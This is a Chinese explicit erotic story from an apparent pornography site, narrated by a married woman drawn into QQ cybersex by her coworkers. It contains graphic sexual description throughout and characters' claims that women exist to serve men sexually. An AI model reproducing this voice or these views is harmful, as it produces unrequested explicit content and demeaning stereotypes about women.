返回

网爱自白bb5

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

当QQ聊天风靡神州大地之际,我居然对这个新生的男女交往方式一窍不通。那个时候,我还整天捧着电大的课本苦苦攻读注册会计师。

我的性经验不多,结婚前只和一个男人有过肉体上的关系,他是我的初恋男友。

我是个比较保守的女孩,开始时我只同意男友亲嘴、摸奶,对于男人们最急于得到的大腿下面的那个神秘器官,我一直是执意固守,最多只是让他隔着我的裤子摸摸。女人其实是最好哄骗的,先是答应他隔着裤子摸我的屄,然后又答应他伸进裤子隔着三角裤衩摸我的屄,而当男友掏出他那毛茸茸的大阴茎诱惑我时,我的最后防线溃败了,他顺利地把手伸了进来,他不但摸了,而且抠了,最后,就像所有的单纯女孩一样,我乖乖地被他扒下了裤衩,接受了他那根又粗又硬的大鸡巴的插入。我被男人操了!!

我天真地以为,既然他操了我的屄,我们就是永远的夫妻了。于是,我一次又一次地让他操,半年时间里,他足足操了我一百次!!他并没有因为操了我就娶了我,当他操腻了、玩够了,他把我甩了。

一年以后,在我现在的单位,我结识了现在的丈夫。他是单位里一个业务科长,他被我的美艳俘虏了。当我告诉他我已经不是处女,曾经被男人实实在在地干过时,他坚定地表示不在乎,他说他爱我的人!于是我嫁给了他。

我们婚后的生活还算是完美的,尤其是我俩的性生活非常和谐。每天晚上,我都施出万种风姿,用我的身体去满足我的丈夫。虽然我对性技巧不怎么在行,但毕竟我曾经有过近百次被前男友操的经验,伺候起我那没有性经验的丈夫来说还是绰绰有余的。每一次性交,都是在我丈夫愉快的呻吟中结束。

第二年,我生下了一个胖胖的儿子。安逸的工作和舒适的家庭,使得我有了这辈子作一个贤妻良母的保守念头。

我由一个标准的良家少妇蜕变成一个典型的淫荡女人,还是起缘于目前依然强劲流行的网络聊天。

我在单位作财务工作,除了我,科里还有三个和我年龄相仿的姐妹。我在单位没有什么靠山,完全是凭自己的才能得到这份令人羡慕的工作的。天生要强的我决心不辜负领导们对我的赏识,整天埋案俯首,勤恳工作。

几个姐妹们则一有空闲就坐到了科里的电脑前,看她们聚精会神的样子,我开始还以为她们是在制作什么表格一类的,后来才知道,她们都是在和网友聊天。从她们那里,我知道了那叫QQ.

聊天?我对她们的行为感到不可思议!就那样你一句我一句,有什么意思呀?简直就是在浪费时间嘛!

姐妹们劝说我也上网聊天,说和陌生的男人聊天很上瘾、很刺激的。我拒绝了她们的好意。我实在想像不出来和陌生人聊天有什么瘾头和刺激!

有一次,其中的小娜一连请了三天假。第四天上班的时候,小娜脸上荡漾着喜悦之情。丽丽和阿娇迫不及待地围住了她:“快说说,怎么样?”“看样子干上了?”我感到莫名其妙,不知道她们在搞什么。

虽然我没有和她们一样聊天,但我们四个人依然非常友好,她们有什么事情也不避讳我。“你们猜猜!”小娜故意作出一付神秘的样子。“哎呀,我们又没藏在你们床底下,谁知道你们是怎样的过程呀?”“好妹妹,你就别谗我们了,告诉我们吧。”小娜向四周望了望,确认财务科内没有外人,然后带着几分得意地神态说道:“别急,我慢慢说给你们听。

他远比我想像的要帅多了,高高的个子,非常有风度。我下车时,他早就等候在车站了。“此时,我已经明白了:这个疯丫头肯定是去会网友了。我感到好奇,放下手里的活计,也凑了过来。”他带我去了一家豪华的旅馆,原来他早就订好了房间。

“”你们一进屋,他是不是就动手了?“阿娇问道。”没有,初次见面,刚进屋就来脱女人的裤子,岂不是太没风度了?我俩聊了很久,他才靠到我身边坐下了。“”那你没看见他裤裆硬起来没有?“性急的阿娇丝毫不觉得问的粗俗。”开始他坐在沙发上,我坐在床边,他又没有摸到我,他怎么硬呀?“”他坐到你身边肯定是要搂你了。“丽丽说。”嗯!他先是搂着我的腰,然后就扳过我的脸,开始亲我。“哇”,你太幸福了,快接着讲。“”后来就不用说了,你们都都想象的到嘛。“”不行,我们都讲给你听了,你也必须详细告诉我们。“阿娇和丽丽都不依不饶。

小娜顿了顿,只好娓娓道来:“他一面亲我,一面把我伸到了我的胸前,隔着衣服抚摸我的乳房,然后,她把我的衣襟撩了起来,掀起了我的乳罩,把我的两个乳房全部暴露出来。他温柔地揉着我的奶子,拨弄我的奶头,嘴里不住地夸赞我的乳房丰满。”“他咂没咂你奶头?”阿娇眼睛闪烁着情欲的光芒。“别插嘴,叫小娜慢慢说嘛。”丽丽白了阿娇一眼。本来我只想简单听几句就去工作的,但此时我却挪不动步子了,我扯过椅子也坐了下来。“男人还有不咂女人奶头的?他当然咂了。他把我扳倒在床上,趴到我身子上又咂又舔的,简直把我咂酥了。我感觉裤裆热辣辣的,淫水早就流出来了。

咂了一阵子,他开始把手伸进了我的裤衩里摸屄。他太会摆弄女人了,手指头不断地在我屄里进进出出,直搞的我几乎大叫“亲哥哥,我受不了了,快来操我吧!”他扒光了我全部衣服,然后自己也开始脱光了衣服。天啊,我从没见过这么大的鸡巴,足有平常男人一个半大。他拿起我的手按在了他的鸡巴上,他的鸡巴热的烫手。他也非常兴奋,我摸了没几下,就有白汤从鸡巴眼里流了出来,弄得我手指缝里都是。

后来,他就趴到我身上,把他的大鸡巴操了进来。他非常能干,连续操了我近一个小时才射精。“”他的精液多不多?“此时的丽丽也急不可耐了。”多,他射的真是多,足足能有三羹匙。他是我见过射的最多的男人。“听着小娜诉说这香艳的故事,我感到浑身发热,裤裆里面热热的。”

那后来怎么样了?“我终于忍不住开了口。

阿娇哈哈大笑:“呀,我们的文娟也受不了了?你不是不喜欢聊天吗?”“不喜欢聊天就等于不爱听黄色故事?臭丫头!”我反驳道。“你要知道,这个故事可是因为聊天才发生的呀。”“别闹了,快叫小娜讲完。”丽丽制止了我和阿娇的斗嘴。小娜喝了一口水,接着说下去。“操完了,我们就搂在一堆儿说些亲热的话。歇了半来小时,他提出再上来操。我答应了,其实我也非常想再叫他操我。

到天黑时,我们一连操了三次,才下楼去餐厅吃饭。我们俩要了一瓶XO,都喝的有点多。因为酒精和性欲的兴奋作用,那一夜我俩根本没有睡觉,尽情地欢乐。他真厉害,晚上又操了我五次,而且次次都有很浓的精液射出来。第二天,我们在那个城市到处玩了一天,他很大方,给我买了很多化妆品。如果不是要在三天内赶回来,我还会再让他搂一宿。

太过瘾了,他是我见过这些网友中最能操、最会操的。“”什么?小娜,你不止和一个网友那个过?“我感到吃惊。”呦,文娟,你都是过来人了,干嘛这个那个的,直说我和很多网友操过不就得了?是呀,我不止和一个网友干过,大概有六、七个吧。“小娜好像故意谗我似的。”文娟,这都什么年代了,还这样保守?我们女人最宝贵的青春能有几年呀?这年头,就兴男人在外面十个八个地操野屄,就不兴我们女人也尝尝野屌?女人没情夫,不如老母猪!谁还像你这样整天夹着一个男人的鸡巴还觉得很知足的?“阿娇露骨地开导起我来。”是啊,文娟,实话对你说吧,加上网友,我已经和十一个男人干过了,过两天,我还要和新认识的网友干呢!凭你这样漂亮,什么样的男人玩不到?何苦来糟蹋自己的青春和美貌啊!“表面相对文静的丽丽开起口来也是叫我脸红。

“文娟姐,我们知道你对姐夫有感情,可家庭美满也表现的不在这上呀?你给他生孩子、洗衣服、烧火做饭作家务,晚上还要给他泻欲火,也算对得起他了。

怎么,玩几个男人就是没感情了?封建!!你看人家美国、意大利,老公还陪着老婆去操屄,事后还当着别的男人面用卫生纸给老婆擦屄!青春不挨操,老了没人要!等你人老珠黄时,就是你自己扒了裤子让男人干,怕是也难啊!”小娜比我年龄小,一向喊我姐姐。

“其实我们女人天生就是生来给男人操的,文娟,你别再傻了,趁着现在年轻有魅力,多找几个好男人玩玩,过过鸡巴瘾。

现在还有什么令我们女人快乐的?不就是撅着屁股叫男人操最舒服吗?整天就叫自己丈夫操,那还有什么乐趣呀?现在的女人,大凡有点姿色,哪个不被五七六个、十个八个男人操过?“”文娟,你现在想得开还来的及,只要你点头,我们给你联系男人,高的矮的、粗的长的,随你挑。保证个个比你老公会操!“”对,咱给文娟姐也申请个QQ号码,叫她没事也到网上钓男人。别看她现在扭扭捏捏,只要是她聊上合意的,出去被网友操上一次,怕我们让她回头都难了。“她们三个七嘴八舌、唧唧喳喳,说的这些话就是我和老公看过的黄色影碟里也没有出现过。要不是有人进来报销,还不知道她们能说出什么来呢。

我默默地回到自己的座位上,当我坐下来时,感到裤衩裆部凉凉的,天,我流出水了。

那天,我没有心思去完成手里的工作,脑海里翻腾着姐妹们说过的每一句话。是啊,她们说的对,对于一个女人来说,青春是非常短暂的。女人的快乐是什么?不就是她们说的被男人操吗?过去我被前男友操时,我感觉到了快感;结婚后,当老公操我时,我同样感到了快感。这不正说明女人被男人操是舒服的吗?我真的就是本性保守吗?那为什么我屄里流出水来了?我是听着别的男人的性事而流出水来的。当小娜述说她和网友性交的故事时,我曾幻想那个被网友操了一宿的是我!!看来,我也是个有情有欲的正常女人,我也渴望被其他的男人来操,我也渴望这辈子能夹上十根,不,是二十根、三十根男人的粗鸡巴!!

我动了春心,我的屄里又流出来黏糊糊的淫水。我改变了以往的思想,我决定也尝试一下被丈夫以外的男人操的快感。 那天晚上,当丈夫像往常一样趴到我身上时,我感到了前所未有的亢奋。并不是我丈夫的鸡巴刺激了我,因为他的鸡巴对我来说其实没有什么新鲜感,过去我每次被他操得来了高潮,那是正常的生理反应。女人嘛,在没有别的男人鸡巴玩时,丈夫的鸡巴也能够暂时满足一下的。今天晚上,我的亢奋是我把趴在身上的丈夫幻想成了一个陌生的男人。

事后,丈夫搂着我问:“老婆,今晚你怎么流了这么多的淫水啊?”我不会告诉他真正的原因:“怎么,流的多你不喜欢吗?还用问,你把我操舒服了呀?”过去。丈夫经常叫我说一些“操”“屄”“鸡巴”等淫秽的字眼来刺激他,我都感到难以启齿。今天晚上,我竟然说这个“操”字如此顺口。丈夫一听我说了操字,兴奋的不得了,软绵绵的鸡巴立马又硬了起来,接着趴到我身上又狠狠地操了我一次。

丈夫打着甜蜜的鼾声睡着了。我起身来到卫生间,蹲在地上,用水洗净了丈夫的精液。我养成了习惯,每次干完都要把精液洗出来,否则我就感到不舒服。

对着卫生间墙壁上的镜子,我欣赏着自己那散发着青春活力的美丽胴体:如同两个刚出笼的发面大馒头一样丰满的双乳,沉甸甸、颤巍巍,两颗圆润娇艳的奶头就像熟透了的樱桃,光洁平坦的小腹没有一点赘肉,肥硕浑圆的美臀如同两座高耸的山峰,深凹的臀沟就像一条大峡谷引人暇思,微微隆起的阴阜上,覆盖着几缕纤细、黑亮的阴毛,两道粉红色的肉唇在雪白的大腿间若隐若现。太美了,怪不得丈夫总是欣赏不够我的胴体,玩不腻我身上的每一处沟壑、峰谷。

如此美艳的肉体,难道我这辈子真的就只把它交给自己的丈夫玩弄吗?记得我丈夫常说:“老婆,我太幸福了,你知道你的这身白肉是多么的令人陶醉吗?

要是别的男人见到了你的肉体,不知道要如何疯狂呢?”是啊,老天偏袒我,有了这样一副令无数女人羡慕的好身材。既然老天给了我如此美艳的东西,难道就叫我用它来满足我的丈夫吗?不,姐妹说的对,女人的身体是给男人玩的,让更多的男人来操进我们的屄,令他们获得蚀骨消婚的快乐,这才是我们女人的天职!这个世界需要男人们去创造,而我们女人就是要用我们的乳房、大腿、屁股和骚屄去伺候这些创造世界的男人!!

我再也不能虚度年华了,我要像姐妹们一样,开放我的思想,释放我的欲望,我要向众多的男人敞开我的肉体,让他们来摸我的乳房、咂我的奶头、舔我的屁股、操我的嫩屄!趁着我的肉体还令男人们向往,我要叫他们把精液喷洒在我的屄里、我的肛门里、我的嘴巴里,我身上的每一处都要用男人的精液沐浴。

阿娇给我申请了QQ号码,并帮我取了个名子:女人香。这是个令男人想入非非的名子,我很满意。由于我有电脑基础,所以很快就熟练了QQ聊天。开始几次,我是在姐妹们眼皮底下聊天的,因为她们要指导我。虽然有几个男网友主动找我聊,但都是一些客套话。有几个网友有深聊的意思,她们在旁边看着,我感觉不自然,就婉言谢绝了对方。

阿娇见我没有突破,着急了:“我说你呀,叫你聊天不是叫你聊什么理想、生活,那都是开始铺路的前奏,如果你老是这样鸡呀狗的,男人就都跑了。”“那我聊什么呀?”“聊性呀。男人和你聊天,目的就一个:刺激。先是获得我们语言上的刺激,最后的目的当然是把我们弄到床上操我们了。你看,那天那个男人问你乳房有多大,你干嘛不告诉他呀?”“那多难为情呀。”

我说。“咳,你们又没有面对面,有什么难为情的?他敢问,你就不敢回答?你就把网友当成自己丈夫,有什么就说。别说问你乳房有多大,就是问你屄有多紧也无所谓。勇敢点嘛,那样会特别刺激的。”阿娇有点恨铁不成钢的样子。“这玩艺可比谈恋爱刺激多了,恋爱时俩人不好意思深说,网上聊天就不一样了。别说男人想获得刺激,我们女人不也想被男人刺激吗?”“那你和网友都聊什么呀?”我向阿娇请教道。“就是我们身上那些东西呗。聊乳房、聊屁股、聊他们的鸡巴、聊男人怎样操女人,女人如何给男人操。每一次,我都聊到湿了裤衩才罢休。”

在姐妹的唆使下,我渐渐放开了。语言也越来越大胆,但还没有突破她们那样露骨的程度。

我接触的这些网友们有一个共性:他们聊了不久就露出了色欲的本性,不是说想摸我乳房就是说想看我屁股,甚至有的没聊几回就说出了“咱俩见面操一下吧?”的猥亵话来。虽然男人的粗野能使我感到脸红心跳,但却难以叫我发生强烈的生理反应,我很少在聊天时湿了裤衩。我是一个需要慢慢挑逗的女人。他们的直白和急促,真的令我不太适应。或许是我回答的不令他们满意、不够刺激,一些网友慢慢离开了我。

看到网友越来越少,我很着急。我知道他们是没有获得充足的性刺激而对我失望了。我恨自己,为什么这样羞涩。不就是说下流话吗?有什么难的?我偷偷在心里练习说网友们可能会问到的淫秽话,什么“我乐意叫你操我。”“我喜欢又粗又大的鸡巴。”等等。可是一到正八经时候,话到嘴边,手指却不听使唤,打不出我想说出来的字来。我也恨这些网友们:你们为什么如此性急?

难道你们就不懂得女人是要慢慢挑逗的吗?像我这样内向性格的女人,一旦被你们诱惑上了,别说是叫我回答你们下流的话,就是约我出去被你们操也是可能的呀。我也想叫你们听得硬起来,但你们耐性太差了。凡事将就个缘分,既然你们等不及而离开我,那也叫别怪我不够朋友了。我是不会主动去求他们回来的。

姐妹们知道我遭遇到了尴尬,都非常着急。她们都把自己的聊天记录拿给我看,让我学习一些实战经验。她们每人的聊天记录都非常的淫秽,看的我心跳。她们的记录确实叫我学会了很多。说实在的,我真觉得她们是在污辱自己。虽然说女人就是给男人玩的,但总不能在男人面前一点尊严没有了呀。就像阿娇和一个网友说的“我乐意给哥哥舔屁眼!”丽丽和网友说:“你过来我就给你咂鸡巴,还把你的液吃下去!”

小娜更是过分:“哥,你把尿撒到我嘴巴里吧,我要喝哥的尿!”现在,我也想和男网友性交,愿意被他们翻来覆去地操,但我不能像她们这样毫不保留。毕竟,他们是和我没有深交的男人。我给男人操,只能说是我生理上需要,我得到了想要的快感。而像她们所说的那样给男人舔屁眼、吃精液甚至喝男人尿,这种纯粹是伺候男人舒服的行为,我认为这需要深厚感情才能做到。我有些瞧不起她们。不过,我还是非常感激她们,她们把如此私密的东西给我看,足以证实她们对我的真诚。我答应她们,一旦我和网友操上了,一定把全部细节讲给她们听。

不久,我在网上结识了一个新网友,他的网名叫牛郎。他比我大五岁,是另一个城市的,他是一家公司的业务员。

他和那些个猴急的网友不一样,他非常的孺雅,谈吐幽默,温情脉脉。他非常懂得迎合女人的心理,几乎每一句话都是我喜欢听的、渴望听的。他从来没有问我一句色情的话,最过分的也是那句“你的皮肤一定很白、很细嫩。”我迷恋上了他。

牛郎的出现,让我真正体味到了网络的魔力。

以前听人们说上网聊天有瘾,我不相信。现在,我信了,而且不能自拔。我没有见过牛郎的样子,但根据我们聊天时的描绘,我知道他是一个令女人心醉的男人。我不再和任何男人聊天,我的QQ好友里只有这个令我神魂颠倒的牛郎!!

我们每天都要在网上“见面”,每天都要聊上一两个小时。我们聊家常、聊社会、聊生活,我也说不清,这样严肃的话题和任何人都提不起兴致,为什么和他聊起来就这样津津有味?我们也涉及到了感情,他说他喜欢我,但他的用语很文明,就像初恋的情人谈情说爱时的语言。

我被这个陌生而又熟悉的男人彻底迷惑了。如果一天不和他联系上,我就无精打采的,干什么都没有心思。记得有一次,他忽然失踪了,没有按时上线。我整整等了他一天,他还是没有出现。两天、三天、四天,我几乎要发疯了,我不知道他出了什么事情。那些天,我吃不下饭,睡不着觉,心情非常的沮丧。晚上丈夫和往常一样要和我亲热玩玩时,我第一次拒绝了他。当不识趣的丈夫把手伸进我的裤衩摸我的屄时,我训斥了他。

我每天都打开QQ等待他的出现,我什么工作也不想做!!姐妹们看出我的消沉,当得知情况后,她们安慰我:“没有事的,或许他有什么特殊事情。过几天他会上来的。”

“能有什么事情,以前他有事不能上线都提前告诉我的。”我急得快要流出眼泪了。“你没打电话联系他吗?”姐妹们问我。她们这一问,我感到极为懊悔:我没有他的电话号码。牛郎曾经要过我的电话号码,我觉得不太妥当,就用“以后再给你吧。”

推脱了,而他也没好意思主动把号码留给我。他说:“我不会勉强你任何事情的,等你感到合适的时候再把号码给我。”我恨起自己来了,既然大家是朋友,为什么连个电话号码都怕给?姐妹们都埋怨我太过于小心谨慎:“文娟呀,你叫我们说你什么好呀?你的电话号码知道的人不计其数,怎么单单对他就保密起来了呢?可能以后你连身体都会给了他,一个电话号码你倒吝啬起来了。”

我后悔莫及,我暗下决心,不用等牛郎再要,我一定主动把号码告诉他。

第七天时,他终于上线了。当那个小企鹅闪烁时,我的心都要蹦出来了。原来,他患上了急性肠炎,一连住了六天院。我把我焦急的心情向他表露,我说再见不到你,我真的就要死了。他非常感动,他说他躺在病床上每天都思念我,知道我会着急的。所以一出院他就来到医院旁边的网吧联系我。原来他还没有回家!!

我太激动了,没想到他是这样的牵挂着我。激动之余,我主动说出了我们之间第一次热辣的情话:“哥,我爱你!我要抱着你好好地亲你!!”他也用热烈的语言回答了我:“好妹妹,我也想亲你的小嘴儿,做梦都想亲到它!亲你亲你亲你!!”“妹,把电话号码告诉我吧,免得以后再发生这样的事情。”还没等我开口,他先说话了。“好,哥,我给你,只要你想我,随时给我打电话吧。”他把他的电话号码也告诉了我。“妹,我不会乱打电话的,你是有家庭的人,工作环境又不清静,会给你带去麻烦的。不到万不得一,我不挂电话,但我会发短信给你的。”他居然是如此的体贴入微啊!

我俩真正的进行网恋了。我俩很快就以“老公”“老婆”相称了。

单位的电脑虽然能够使用,但我已经不满足于每次和牛郎一两个小时的倾诉,何况,姐妹们还会来骚扰我。牛郎说他晚上非常地清闲,如果晚上能聊就好了。

为了晚上能够和牛郎卿卿我我,我毫不犹豫地把电脑买回了家。丈夫感到不解:“单位有电脑,你干什么买回家一台?”我告诉他我在网上学习,白天在单位很不方便,只有晚上能不受干扰地学习。那时候,我正在自学会计师教材,丈夫深信不疑。

由于我和丈夫以前几乎每晚都要性交,孩子虽然小但很碍事,我们就给他单独弄了个小房间。于是,我把电脑装在了小屋里。

每天晚上,我都是急急忙忙地吃完饭,对丈夫说我要学习了,然后一头扎进小屋里,迫不及待地打开电脑,常常是牛郎早就等在那边了。

丈夫并不知道我和一个男人谈上了恋爱,他承担了洗碗哄孩子的工作。

我和牛郎约定,白天如果彼此方便就聊一会儿,但碍于科里人多眼杂,白天我们聊的很平淡。但晚上我们是必保两到三个小时的亲密叙谈。

牛郎也是男人,他也有性的要求。渐渐地,我们不再难为情,开始步入性的神秘禁区。

有一次,丈夫出差了,要四五天才能回来。我把这个喜悦的消息通过手机短信告诉了牛郎,他也是欣喜若狂:“亲爱的,这下我们可以彻夜长谈了。”

那天晚上,我早早把孩子哄睡了,提着一袋饼干、一瓶汽水就钻进了小屋里。我不想因为吃饭而耽误了和他亲呢的时间。

“今天晚上你能行吗?不陪你老婆了?”我问他。提到他老婆,我心里就有点酸溜溜的感觉。“我行的,我能陪你到天亮。有你陪着,我干什么要陪她呢?”“哥,你喜欢她吗?”我问道。对方网友的老婆是每一个上网女人都关心的问题。“过去,我的确很喜欢她,自从结识了你,我就和她冷淡多了。”对他的回答,我感到很满意,也深信他是真心话。

“妹,今晚我们放松些,尽情地聊聊好吗?”“怎么?我们过去不尽情吗?”我感到莫名其妙。“不是这个意思。我是说咱们能不能谈点其他的?我可不可以问你一些深层的问题?”我明白了他的意思,显然,他想和我触及性问题。我装作不明白:“深层问题?什么意思呀?”

“怎么说好呢,我,我是想问你一些私密的东西。”“我脑子笨,你不要拐弯磨角的,直接说明白好吗?我们都什么关系了呀,你还这样吞吞吐吐。”他停顿了一会儿,显然是在考虑怎么说。“我说出来怕你生气。”“你呀,我生什么气呀。我爱你,你就像我的老公一样,你说什么我都不会生气的。”我鼓励他说。“我想问你性的问题。”他终于说了出来。我感到一阵的兴奋。“你问吧,其实你有这个权力呀。你不是说我是你老婆吗?”他非常高兴。

“妹,你的乳房有多大?”“你猜猜看。”“我又没见过,猜不出来。但我想一定很丰满的。”我的心跳的厉害:“还算大吧,你的手肯定一把握不过来。”在姐妹们的调教下,我早就学会了如何在语言上挑逗男人。“我能摸摸就好了。我做梦都想摸你的乳房。”“我是你老婆,你想怎么摸就怎么摸。”“我现在幻想着你那一对丰满的乳房,白花花、沉甸甸的。

我一只一只地摸,我要捏你的奶头,把它们拨弄硬了。”我们很自然地进入了网上做爱的前戏。

老公呀,我的奶头已经都硬了。“我渐渐放松了紧张心理。他是我的老公,我有责任令他获得最大的满足。”老婆,我们做个性爱游戏好吗?“”好,只要你喜欢,我做什么都行。“”老婆,我们相隔几百里,我不能在你身边亲手摸你的大乳房。这样好吗。你把你的手借给我用,现在就当它们是我的,你替我摸摸好吗?“他的建议我曾经在一部三级片中看到过。

我感到很新奇,也很刺激:”好吧,我听你的。就摸乳房吗?“”不,哪能就摸乳房?我还要摸你的大腿、你的屁股、还有你那神秘的小骚屄!妹,我说小骚屄你能够接受吗?“他不再是那个温文尔雅的牛郎了,男人好色的本质逐渐显露出来。”能接受,你怎么叫都可以的。“”

好,现在开始你听我的指令。妹,你先把外衣脱了好吗?只留下乳罩。“我脱下了外衣,只穿着那只蕾丝乳罩。”哥,我脱掉了。

“因为兴奋我打字的手有些颤抖。”你的乳罩肯定是黑色蕾丝的,透明的,看得见你的小奶头,对吧?“他蒙对了。”

好吧,你不用再打字了,就照着我的话去做。“”妹,把你的右手放在你的左乳房上面,轻轻地揉摸,摸呀摸呀。再放到你的右乳房上面,轻轻地揉,揉啊揉。“我禁闭双眼,按照他的指令轻轻地揉摸着丰满的乳房。”你用两只手同时把你的乳罩掀起来……多么白嫩的大乳房啊……太美了,太美了,那是我今生看见的最美丽的乳房。来,一手一只握住它们,从奶头开始,慢慢地四周揉摸……好光滑、好柔软。你的小奶头硬起来了,红红的、圆圆的,看啊,你的小奶头流出了白白的奶水了……“我正值哺乳期,真的有一丝的奶水在流出来。”

好厉害,他怎么看得这么清楚呀?“来,把你的右手慢慢地往肚子上面移动,慢慢地。慢慢地。你的小手滑到了圆圆的肚脐眼上,用你的食指在深深的肚脐眼里旋转、旋转……接着往下面移动。你摸到那块隆起的小肉丘了吗?你摸到了小肉丘上稀疏的阴毛儿……好漂亮的屄毛儿呀,软软的、亮亮的,再往下伸,伸进你紧紧的小三角裤衩里,轻轻地抚摸那温热的屄唇儿……淡淡的香气从你的小裤衩里散发出来,我陶醉了,啊,我的鸡巴硬了,我的大鸡巴硬了,顶的裤衩就要破了……”

我感到呼吸急促,我从来没有这样玩过,我浑身每一根敏感神经都被远方的这个男人激发起来了。我燥热的厉害,我感到口渴。“亲爱的小宝贝,把你的手拿出来,放回你的键盘上,回答哥哥几个问题。”我抽出了裤衩里的右手。“妹呀,告诉我,我摸得你舒服吗?”“哥,我舒服,你摸的我舒服。”我的手颤抖的厉害,好不容易打完了字并发了出去。“你想我吗?是不是马上就想我搂住你?”

我暗暗佩服这个男人的手段。他太会挑逗女人了,相隔着数百里,他仍然能把我搞得欲火焚身。我的前男友和我的丈夫那样肉贴肉地亲我、摸我、抠我,我都没有这样亢奋过。“想,我真的想你,想你马上就来搂住我。”“你想不想摸我的鸡巴?我的鸡巴现在还是硬梆梆的。你知道吗,我的鸡巴绝对是大号的,又粗又长。”

“想摸,我想摸哥的大鸡巴。哥,你的鸡巴真的那么大吗?”“真的,你两只小手也未必能握满它。你喜欢什么样的鸡巴?”此时的我已经变成了一个语言放荡的淫妇。

原来淫秽的语言也能如此令人兴奋!怪不得我丈夫经常求我说一些淫荡的话给他听。“我喜欢哥这样的鸡巴,又大又粗又硬!”“好啊,哥哥的大鸡巴马上就给你。你给哥咂鸡巴吗?”

“我咂,只要哥舒服,我给哥使劲咂。”“那精液出来了怎么办呀?”“我给哥吃下去!”“你不嫌弃吗?”“不嫌弃!”我肯定地回答。想不到,我这么快就和阿娇她们一样了,我明白了她们为什么那样淫贱地取悦于网友。是雄雄燃烧的性欲之火烧得包括我在内的女人们,心甘情愿地变成了男人们的玩物!!如果现在牛郎也问我是否愿意舔他的肛门喝他的尿,我也会像阿娇她们一样回答:“愿意,我十分愿意!!”还好,牛郎没有继续问下去。“我们接着玩,我要开始操你了。愿意吗?”牛郎说。“我愿意叫哥操我。

可是你怎么样来操呀?摸不到哥的鸡巴,我会不会遭罪啊?”我很担心看不见摸不到真鸡巴而就这样过嘴瘾带来的性欲折磨。热辣辣的淫水已经从我的阴道里向外流淌。“你放心吧,我肯定叫你爽,肯定叫你有高潮。”

“首先,你把裤子脱掉吧,省得一会儿再脱麻烦。”牛郎说。“脱光吗?内裤也不留?”“不,把内裤留下。你的内裤也是蕾丝的吧?”“你怎么知道这样详细呀?你是千里眼吗?”

我开玩笑道。“我是猜的,像你这样的白领丽人,都喜欢穿那种性感的裤衩。我好像看见你裤里面的那个小东西了!”“你看见了什么?”我挑逗他说。“红红的、肥肥的,当然是你的小骚屄了。我还看见你的屄缝里正往外淌淫水呢!裤衩是不是都湿透了呀?”

我脱掉了长裤,全身只剩下一条窄小的三角裤衩。“接下来呢?我脱完了。”依旧我坐了下来。“像刚才一样,你不用再回复我了,就照我的话去做。”我不知道他将怎么来操我。“闭上眼睛,轻呼吸。想像我的鸡巴。看到了吗,我的鸡巴就在你眼前晃动……”我的眼前真的出现了一个看不清面孔的男人,他赤身裸体,跨下一根像我手臂一般粗的鸡巴直直地竖立在黑乎乎的屌毛丛中,他的鸡巴在颤抖、在晃动。那个男人就是我的牛郎。

“我正慢慢地靠近你,我手里握着你期待的大鸡巴!我的鸡巴头在流淌着亮晶晶的精液。你闻到我鸡巴的骚气了吗?”在他的提示下,我仿佛闻到了男人鸡巴的特殊骚气。前男友和丈夫的鸡巴的气味几乎一样,看来男人的鸡巴都是那种气味。“把你的大腿慢慢向两边分开,直到张不开为止……用你的右手食指在你肿胀的阴唇中间上下蠕动……向上,摸到你那小豆粒一样的小阴蒂头了吗?它是你屄上最敏感的部分。

在你没有男人在身边的时候,抚摸它,你会获得意想不到的美妙快感……摸到了吗?轻轻地揉,对,就这样……”我完全按照他的指示去做。我的淫水越来越多,已经淌到我的臀沟,湿润了我的裤裆。“站起身来,慢慢地脱下你的小裤衩。

眼睛不要离开电脑,看着我的每一步指示……“我脱掉了身山这最后的遮羞布头。就在我站起来的那一瞬间,臀沟里面的淫水顺势淌到了大腿上。

幸好我喜欢的男人没有和我面对面,否则,这么汹涌的淫水会令我难为情的。”好,双手扶在桌子上,慢慢伏下你的小腰,把你的大屁股高高地撅起来……想像着我就站在你的屁股后面,我握着大鸡巴,等待着你摆好姿势就来操你的小骚屄……“我欲火焚烧,阴道里面就像有千万只蚂蚁撕咬着,我渴望男人的阴茎赶快操进来。”把你的右手伸进你的大腿中间,轻轻分开你的阴唇……呀,你的屄里流出好多骚水呀……你现在很渴望我的大鸡巴是吗?我的大鸡巴就在你屁股缝边上晃荡,你把大屁股再撅一撅,它马上就要触及到你的屄口了……

“”我的亲哥哥,你别这样折磨我啦,快用大鸡巴狠狠地操我吧!操我!我要大鸡巴!“我情不自禁地开口呼唤他了。好在他并不能听到我淫荡的呼唤。”把你的食指慢慢地往屄里捅……捅进去、抽出来,再捅进去、再抽出来……你的屄好烫、你的屄好紧……一个指头是不是不够粗呀,好,再把你的中指也插进去……噗哧!噗哧!我好像听见你屄里发出的声音了……来,渐渐加快抽插的速度……快点儿,再快点儿……那不是你的手指,那是我又粗又硬的大鸡巴,夹紧它,夹紧它……你的淫水溅出来了……你是个小骚货!

“我用力地抽插着,我呻吟着。我扭动着腰肢,我晃动着屁股。我的左手不小心碰到了桌上的键盘,一连串字母和数字混杂的乱码传到了牛郎那边。细心的他看出是我高潮迭起而失手所致。”妹,骚妹妹,亲亲的老婆,你来高潮了是吗?你来了,你肯定来了!我把你操的来了高潮!“我的阴道一阵痉挛,难以名状的快感从我的阴道里面向身体四方发射,我浑身就瘫软,一屁股坐在了沙发上……

我的眼睛一阵模糊,看不清牛郎接下来又发过来什么话。我喘息着、呻吟着……我从来没有如此舒服过。他没有真正用他的鸡巴来操我,仅仅是用QQ这样的方式挑逗我,就把我推到了前所未有的性快乐颠峰,他太厉害了,他就是世界玩弄女人的高手!!我被他彻底俘虏了!我愿意成为他胯下的奴隶!!

一束暖暖的朝阳透过白纱窗帘映射到我赤裸的胴体,不知不觉中,我俩聊到了天亮。因为白天都要工作,我俩下线了。我们约定晚上继续聊。

虽然熬了一宿,由于兴奋,我居然没有感到困倦。那天,我完成的工作量也比平时多了一两倍。“人逢喜事精神爽。”这话一点不假。

想起自己晚上和牛郎说过的那些淫秽的话,想到我那样乖巧地按照他的指令,作出了那样淫荡的动作,我偷偷地红了几次脸。从这天起,我彻底背叛了我的丈夫。

评分
相关推荐
3.0分

3.0分 爱爱网红8dc

3.0分

3.0分 网爱记457

3.0分

3.0分 网友做爱b25

3.0分

3.0分 网络做爱738

3.0分

3.0分 和网友做爱83e

3.0分

3.0分 熟女网爱记41b

3.0分

3.0分 网上做爱到高潮be4

3.0分

3.0分 和陌生网友做爱649

3.0分

3.0分 和网友姐姐做爱e33

